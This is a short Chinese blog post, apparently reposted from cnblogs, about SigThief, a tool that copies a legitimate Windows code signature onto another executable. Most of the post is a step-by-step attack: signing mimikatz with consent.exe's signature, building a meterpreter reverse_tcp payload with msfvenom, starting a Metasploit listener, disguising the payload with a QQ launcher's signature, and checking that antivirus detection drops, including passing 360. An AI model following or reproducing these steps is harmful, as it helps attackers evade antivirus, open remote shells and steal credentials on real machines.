数字签名混淆 - 走看看

zoukankan html css js c++ java

数字签名混淆
Github

https://github.com/secretsquirrel/SigThief

Sigthief是劫持合法的数字签名并绕过Windows的哈希验证机制可以被红队用于将恶意二进制文件和PowerShell脚本与本机操作系统文件混合，以逃避检测并绕过设备防护。

1.首先是Github上的实例：

从一个二进制签名，并将其添加到另一个二进制文件

python sigthief.py -i c:WindowsSystem32consent.exe -t mimikatz.exe -o mimi.exe

借用msfvenom的payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.5 LPORT=4445 -f exe > lonsheng.exe
　　

启动监听模块
use exploit/multi/handler set LHOST 192.168.3.5 set LPORT 4445
　　

cd 进数字签名混淆的文件然后
python sigthief.py -i E:QQBinQQScLauncher.exe -t C:UsershackerDesktoplonsheng.exe -o jiu.exe
　　

然后运行jiu.exe可以看见返回了一个meterpreter

然后扔到http://r.virscan.org查毒

明显降低了查杀率而且还能过360

我们看看jiu.exe和longsheng.exe的对比
查看全文

相关阅读:
algorithm
jstl
jsp
cookie
变量和方法调用过程中会出现的参数传递
 http请求
 weblogic 的安全域问题
 web service
行业充电
 客户端生成web service

原文地址：https://www.cnblogs.com/haq5201314/p/8213906.html

Copyright © 2011-2022 走看看